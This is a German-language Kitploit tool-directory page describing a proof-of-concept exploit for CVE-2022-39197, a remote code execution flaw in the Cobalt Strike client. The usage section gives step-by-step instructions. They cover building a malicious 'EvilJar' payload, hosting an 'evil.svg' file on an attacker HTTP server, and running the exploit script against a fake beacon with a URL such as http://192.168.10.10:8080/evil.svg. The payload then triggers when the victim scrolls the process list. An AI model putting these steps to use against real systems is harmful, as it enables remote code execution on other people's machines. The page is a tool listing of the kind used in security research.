Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-39197-RCE — CVE-2022-39197 RCE POC | Kitploit
Tools/GitHubGitHub/thecryinggame/cve-2022-39197-rce
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPayload Development
GitHubthecryinggame/cve-2022-39197-rce

CVE-2022-39197-RCE

CVE-2022-39197 RCE POC

Repository anzeigen
134vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-39197-RCE

Erstes

Dieses Projekt wurde von @its-arun übernommen und basiert auf https://github.com/its-arun/CVE-2022-39197

Als ich das Skript testete, stellte ich fest, dass das Frida-Skript die Daten nicht in der normalen Reihenfolge abfragen konnte. Die Methode bestand darin, das Frida-Skript zu modifizieren, um den Prozessnamen zu ändern.

Dank an Meister @Kai5174 für seinen Beitrag zur Nutzungsmethode.

Verwendung

  • Payload vorbereiten
  1. Bearbeiten Sie den Befehl, der mit Ihrem Payload in EvilJar/src/main/java/Exploit.java ausgeführt wird. Derzeit kann nur der Taschenrechner geöffnet werden.

  2. Mit jar erstellen: mvn clean compile assembly:single

  3. Verschieben Sie EvilJar-1.0-jar-with-dependencies.jar aus EvilJar/target/ in den Ordner serve/

  4. Bearbeiten Sie serve/evil.svg und ersetzen Sie [attacker]

  5. Mit python3 -m http.server 8080 bereitstellen

  6. Erzeugen Sie eine beacon.exe mit einer C2-Version kleiner oder gleich 4.7

  7. Sie müssen das py-Skript unter Windows ausführen, um online zu gehen, und Gegenmaßnahmen ergreifen, wenn der Client auf die Prozessliste zugreift und den beacon.exe-Prozess sieht.

  • Exploit ausführen
root@kitploit:~
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg

Der Payload wird ausgelöst, sobald der Benutzer durch die Prozessliste scrollt.

POC

Windows 1.png

Mac 2.jpg

Referenzen

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Es gibt eine großartige detaillierte Analyse dieser Schwachstelle. https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Modifiziert von https://github.com/its-arun/CVE-2022-39197

Tool herunterladen